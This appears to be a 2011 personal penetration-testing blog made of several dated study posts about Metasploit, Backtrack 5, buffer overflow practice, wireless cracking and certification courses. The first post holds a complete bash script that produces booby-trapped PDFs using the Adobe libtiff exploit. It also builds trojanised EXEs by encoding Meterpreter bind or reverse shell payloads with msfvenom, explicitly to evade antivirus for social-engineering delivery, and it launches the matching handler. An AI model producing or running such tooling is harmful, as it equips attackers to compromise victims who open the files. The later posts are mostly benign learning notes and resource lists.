Friday, August 26, 2011

Bash Scripts

I have been practicing more metasploit and bash scripting.  I came up with a quick script for client side exploits.  It is not mind blowing or anything, but it is nice for a quick file with SE. It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure to add to it later but this is just a starting point.  Have to start somewhere....



#!/bin/bash

# This will create a "special" payload for you. Helps when you want to create Meterpreter files fast....
# Uses bash (not /bin/sh) because the tests rely on "==", and every variable is quoted so that
# an empty or multi-word answer cannot break the [ ... ] expressions.

echo "Do you need a pdf or exe 'special' payload?"
read special
if [ "$special" == "pdf" ]; then
    echo "What is the pdf payload, bind_tcp or reverse_tcp?"
    read Payload
    echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."
    if [ "$Payload" == "bind_tcp" ]; then
        echo "What is the rhost IP address?"
        read rhostip
        echo "What is the port we will bind to?"
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        # Build the PDF, then start the handler for the bind payload
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME="/root/pdf_metasploit/$pdf_file" PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E
    elif [ "$Payload" == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"
        read lhostip
        echo "What is the port we will bind to?"
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        # Build the PDF, then start the handler for the reverse payload
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME="/root/pdf_metasploit/$pdf_file" PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
    else
        echo "Did not recognize your response. Please run script again. "
    fi

elif [ "$special" == "exe" ]; then
    echo "Do you want the file to execute the payload in a separate process? Yes or No?"
    read answer
    if [ "$answer" == "Yes" ] || [ "$answer" == "yes" ]; then
        echo "What is the exe payload, bind_tcp or reverse_tcp?"
        read Payload
        if [ "$Payload" == "bind_tcp" ]; then
            echo "What is the rhost IP address?"
            read rhostip
            echo "What is the port we will bind to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            # -k keeps the template's own functionality and runs the payload in a separate thread
            msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT="$Port" -k -x "/root/exe_template/$exefile" > /root/Desktop/bind.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E
        elif [ "$Payload" == "reverse_tcp" ]; then
            echo "What is the lhost IP address?"
            read lhostip
            echo "What is the port we will connect to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST="$lhostip" LPORT="$Port" -i 18 -k -x "/root/exe_template/$exefile" > /root/Desktop/reverse.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
        else
            echo "Did not recognize your response. Please run script again. "
        fi

    elif [ "$answer" == "No" ] || [ "$answer" == "no" ]; then
        echo "What is the exe payload, bind_tcp or reverse_tcp?"
        read Payload
        if [ "$Payload" == "bind_tcp" ]; then
            echo "What is the rhost IP address?"
            read rhostip
            echo "What is the port we will bind to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            # Same as above but without -k, so the template is only used as a container
            msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT="$Port" -x "/root/exe_template/$exefile" > /root/Desktop/bind.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT="$Port" RHOST="$rhostip" E

        elif [ "$Payload" == "reverse_tcp" ]; then
            echo "What is the lhost IP address?"
            read lhostip
            echo "What is the port we will connect to?"
            read Port
            ls /root/exe_template/
            echo "Which exe template do you want to use?"
            read exefile
            msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST="$lhostip" LPORT="$Port" -i 18 -x "/root/exe_template/$exefile" > /root/Desktop/reverse.exe
            msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT="$Port" LHOST="$lhostip" E
        else
            echo "Did not recognize your response. Please run script again. "
        fi
    else
        echo "Did not recognize your response. Please run script again. "
    fi

else
    echo "Did not recognize your response. Please run script again. "
fi

Monday, August 22, 2011

Backtrack 5 R1

Finished installing Backtrack 5 R1 on the laptop on the SSD drive.  Just to note, I tried.  I tried to use KDE once more and I just cannot do it.  Basket note pads is enough to make anyone who has used it switch, but it just wasn't enough.  The GUI just seems cleaner and less of a headache to use.  I am the first person to try to do something the hard way.  Trust me, ask anyone, but it just did not make any sense to me.  It should be more intuitive to use KDE and it just isn't.  I am not in the GUI all the time, but when I am, it should be an easy experience.  Why else even use the GUI in the first place?

Anyway, enough of that.  It was great that they did an update to Backtrack 5, since the DNS plugin bug was a bit of a problem.  I found out later that it was only for the x64 bit versions.  That is what I get for rushing to x64 bit.  Also, it is the reason that I simply did not do the "apt-get update && apt-get upgrade && apt-get dist-upgrade".  I installed R1 pretty quickly since they have made the grub installation seamless.  It always finds my Windows installation and configures the dual-boot perfectly.  Definitely a big plus.  On to the Nvidia drivers, which was easy enough once you keep the nouveau drivers from loading.  I use the site: "https://wiki.ubuntu.com/X/Troubleshooting/Nouveau".  I was able to CTRL+ALT+BACKSPACE and run the executable.  Side note: I love how easy it is to configure in Gnome: System -> Preferences -> Keyboard -> Layouts -> Options -> Key Sequence to kill the X server.  Wonderful. Shout-out to Muts.  I like to add compiz, what can I say.  I cannot help it.  It adds an even bigger cool factor.

Next, I added the usual addons for Firefox after I upgraded it.  Added Chrome and tsclient.  I updated wireshark to 1.7.0 and updated metasploit 4.0 (the usual command svn up).  However, wireshark was a little more complicated.  I found the page "samiux.blogspot.com/2011_07_01_archive.html".  It was very helpful in the install.  Next, I installed VMware Workstation 7 on R1.  Of course, it did not work with the updated kernel on R1.  Luckily, I found the site: "weltall.heliohost.org/wordpress/2011/05/14/running-vmware-workstation-player-on-linux-2-6-39-updated/".  I was able to get VMware running in 2 seconds.  Sweet.  I know I will need that during the OSCE course.  Next, test it with the Alfa wireless adapter.  No problem there.  Next, remove the splash screen during boot-up.  Sometimes, you do not want everyone seeing a big red screen saying Backtrack 5.  Opening up VIM and editing grub.cfg took care of that.

It has been a great install on the laptop.  I am sure I will add more to this post later, but I just had to say how good Backtrack 5 R1 has been.  Every Linux install has its hiccups, but the finished product is what counts.  This is a pretty good end product when you think of what it is supposed to be used for.  It is not OS X or Windows so you will not hear me complain.  Just saying.

Thursday, August 11, 2011

Offensive Security Wireless Professional: OSWP (Post 1)

I am not posting as much as I want on this blog, but I am still giving it a shot.  I just want to recap the past few weeks: I have been preparing for the OSCE course by using exploits in Exploit-DB and re-writing them, from fuzzing to new Python scripts to a shell prompt.  It has been a fun time.  I was able to install VMware Workstation 7 on BackTrack 5 x64 Gnome.  I have two virtual machines to work on buffer overflows, Windows XP SP2 and SP3.  I also have my desktop that has more virtual machines.  That will be essential for the OSCE course, I am sure.

I have also been increasing my reading.  I have been reading "Ghost in the Wires", "Fuzzing", "Shellcoder's Handbook", "Metasploit: Penetration Tester's Guide" and "KingPin".  All of these books are great reads.  I have not finished "Ghost in the Wires" yet but it definitely has my attention.  Kevin Mitnick, Dave Kennedy, HD Moore and Joe McCray are probably my favorite pentesters/hackers. 

In addition, I have started another Offensive Security course: OSWP!!  I ordered the wireless adapter, ALFA AWUS036H.  I have heard good things about the adapter from the EthicalHacker.Net forum.  On the BackTrack 5 forum, there are instructions on loading the Realtek drivers for packet injection.  I am so excited.  Also, I have a Linksys WRT54G wireless access point.  I have registered for the class, but I will be paying for it tomorrow.  Hopefully, I can get the PDFs and videos over the weekend.  I will be posting reviews of the modules and the exam as I go.  Nothing too detailed of course ;-).  When I took the OSCP course, I had a great time learning and I do not expect any less from this course. At least, this time, the exam is only 4 hours. :-).  I have been reading www.aircrack-ng.org for a while now, but never really tried out cracking WEP or WPA.  I foresee a lot of that from now on.  People still use WEP and weak preshared keys for WPA/WPA2.  This will increase my ability to choose a different attack vector during a penetration test.



BackTrack WiFu Online

Thursday, July 7, 2011

More Buffer Overflows

It has been over a month since my last post.  It has been a really busy time.  When they say the most important resource is time, they are not kidding.  Anyway, in that time I have continued to go to exploit-db to practice.  I was able to get some basic stack overflows going on two software ftp programs, easyftp and war-ftpd.  I have been using a test OS of Windows XP SP3.  Most of the exploits seem to center around Win XP SP2.  It would be better to try different service packs, I guess.  Next, I want to find more SEH exploits.  It was fun trying to figure out how to jump around in the stack.  Again, go to http://www.corelan.be/ for information about buffer overflows and infosec in general.  Great stuff.  With easyftp, I was only able to fit the "net user add" payload.  Mannnn, it was a small buffer space.  However, in war-ftpd, the buffer was much larger and I was able to fit a Windows reverse shell.  I have to say, reverse shell is the best.  Just a side note, I have noticed that I have had a lot of success when the payload is encoded in "ShikataGaNai".  It might help someone else so I figured I would mention it.

Just in case you thought I let it go: nope.  Paper is still on.  Of course, the new hacker groups that have come out have made this an excellent paper to write.  ;-) I mean I thought of this before two groups even came out in the media.  Not that they were not there the whole time.  I just need more time to get the thoughts together and more anecdotal evidence to make it more credible.  With everything that is going on, I should probably just post it by the end of the year so I can get all the probable hacks that are still to come recorded.

Monday, May 30, 2011

Buffer Overflows

It has been a while since I posted anything.  It has been a busy time.  I have been able to sneak in some time to work on my OffSec skills.  Hey, I am working on it.  Anyway, to prepare for the OSCE course, I am looking through the 'www.exploit-db.com' site and trying to re-exploit applications that are available using Python.  I like Python a lot and am trying to get better at it currently, so it looked like the obvious choice.  I am running into some confusion on the Savant 3.1 Web Server.  I understand that when exploiting SEH, we are looking for a POP, POP, RET.  I understand that when you have a stack exploit, you look for a JMP into a CPU register.  But somehow, I am getting lost on the POP, RET.  Is it just the same logic behind SEH?  Are we just popping the last entry in the stack and putting the last memory entry in EIP? I have reviewed the exploit code from "http://www.exploit-db.com/exploits/10434/".  Also, there is a great tutorial for EggHunters and Buffer Overflows at "http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html".  Just a side note, this blog has helped me in the past understand SEH exploits along with the site "https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/".  That site is incredible too.  If you want to know about buffer overflows, these are the sites to go to.  Anyway, I am kind of stuck right now, but the irony is that the person who found the vulnerability in Savant is Muts, founder of OffSec and teacher of the OSCP and OSCE courses.  I know I have a lot of learning in store for me with the OSCE.  Hopefully, I can get some more headway with this.  On a more depressing note, I am sure I cannot afford any big CONs this year like I planned if I want to get the OSCE course and move by next year.  But the good news: I am sure there will be great CONs then too.

Wednesday, May 18, 2011

Education: 2011

I have been gathering, watching and reading more and more info-sec data from everywhere, including great books (from Amazon, of course), and it has been helping a lot.  I just wanted to mention some of the things I have been using to learn, just in case you are starting out like me.  Most of the information has been leaning towards social engineering and browser exploits.  For example, if you start looking at enough YouTube clips of DefCons and presentations by the elite security researchers and pentesters, you learn that nowadays most attacks are done on layers 7 and 8 of the OSI model. The recent Playstation PSN hack was reported to have started from a Spear Phishing attack.  It seems that a little social engineering goes a long way.  All it takes is one click.  Depending on the vulnerability, it might even be easier.  With SQLi and XSS, you can move the browser for your victim to introduce an exploit.  A user is directed to the wrong page or opens the wrong email.  It can happen and it obviously does.  Ask Sony.  Here is my list:

Books:
Dissecting the Hack: The Forb1dd3n Network (Half way done)
Python Network Programming (Just beginning)
Social Engineering: The Art of Human Hacking (Just bought)
KingPin (Just bought)
Fuzzing: Brute Force Vulnerability Discovery (Just bought)
The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws (Just beginning)

Videos:
Elearning Security
Malware Analysis - http://youtu.be/fqf5LfPwmm4
Malware Analysis - http://youtu.be/jake9ibMIpc

Joe McCray
PenTesting - http://www.youtube.com/watch?v=tJsNu0VRKYY
Advanced SQL Injection - http://www.youtube.com/watch?v=rdyQoUNeXSg
Advanced SQL Injection (LayerOne 2009) http://www.youtube.com/watch?v=WkHkryIoLD0

Sam Kamkar
Hacking Facebook/PHP - http://www.youtube.com/watch?v=fEmO7wQKCMw&feature=related

IronGeek (Adrian Crenshaw)
Numerous Videos - http://www.irongeek.com/i.php?page=security/hackingillustrated
Dakykilla, Purehate and Irongeek
Password Exploitation Class - http://www.irongeek.com/i.php?page=videos/password-exploitation-class

SecurityTube
Numerous Videos - http://www.securitytube.net/

Python Programming
Computer Science Class - http://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/index.php

Member of EthicalHacker.net
PenTesting Steps - http://www.infiltrated.net/pentesting101.html

EthicalHacker
Great Forum w/ videos, links, articles for Pentesting - http://ethicalhacker.net

Hopefully, this helps other people in the quest for knowledge.  Good Night

Monday, May 16, 2011

Education: 2011

I just wanted to make a quick post about my studies for this year.  I plan on taking a few courses and certification exams this year, like any other year really. I have been slowly preparing to be a better security and IT professional for my company and for myself.  There is a lot of great information out there to learn if anyone is willing to put in the time and energy.  Anyway, so far, I have taken two exams already.  The first, OSCP, was very exciting, informative, fun and difficult.  I will include a review about it in a later post, which it definitely deserves.  The next exam was the CASP exam, which is targeted to be the next "level" from the Security+ exam.  It was a free beta exam so I figured why not.  It was a little difficult since it hit on topics I have not researched before.  It still just seems like a waste of time compared to an exam like the OSCP, which is more hands-on.

The remaining two exams for this year are the OSCE and CCNA.  The OSCE is the next course of the OffSec group after the OSCP.  I must say, I am dying to take this course.  I know it can take me to that next stage of offensive security, such as evading anti-virus, attacking web applications, buffer overflows with staged exploits and writing in assembly language.  It will be a painfully exciting time, I am sure.  Finally, I will take the CCNA exam.  I have put this off for years now.  I just want to get it out of the way, to be honest.  I am just having a hard time getting my hands on either the Cisco IOSes or the Cisco hardware.  The hardware would cost more than the exam.  I tried to go the cheaper route by using the Cisco emulator GNS3.  Of course, you need to be able to get a copy of the IOS.  FAIL.  I do not have access to the IOSes yet.  Legally anyway.  I will end up just buying the hardware.  If you see late night flashes of light and power surges going in your neighborhood, it is probably because I live near you.  I have seen some good deals on eBay and ciscokits.com.  Oh, before I forget, I am also practicing programming in Python. It seems to be great when you want to do network programming.  I am just using homework assignments from computer science courses on the Internet to practice.  It seems to be working.  I will post as I go along.  Good Night...


OSCP: Offensive Security Certified Professional
OSCE: Offensive Security Certified Expert
CCNA: Cisco Certified Network Associate
CASP: CompTIA Advanced Security Practitioner
OSWP: Offensive Security Wireless Professional
GPEN: GIAC Certified Penetration Tester